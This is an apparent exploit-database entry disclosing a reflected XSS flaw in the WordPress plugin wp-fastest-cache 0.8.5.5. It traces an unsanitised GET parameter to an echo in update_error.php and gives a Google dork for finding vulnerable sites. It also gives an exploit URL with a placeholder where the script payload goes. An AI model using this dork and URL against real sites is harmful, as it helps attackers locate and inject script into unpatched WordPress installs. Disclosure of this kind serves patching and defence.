id: 24640
date: 12/01/2015
title: Wordpress Fastest Cache plugin  XSS Vulnerability
author: sniper.t
cves: 

######################################################################
# Exploit Title: Wordpress plugin wp-fastest-cache  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
#Version:0.8.5.5
# Google dork: inurl:/wp-content/plugins/wp-fastest-cache
######################################################################
 
 The code in ./wp-fastest-cache/templates/update_error.php
 

        34: echo echo $error_message; 
        8: $error_message = strip_tags($error_message); 
            7: $error_message = str_replace(array("\"", "'"), "", $error_message); 
                6: $error_message = $_GET['error_message']; 

 
 
Exploit
http://server/wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=/*XSS_HERE*/


#  0day.today [2023-03-24]  #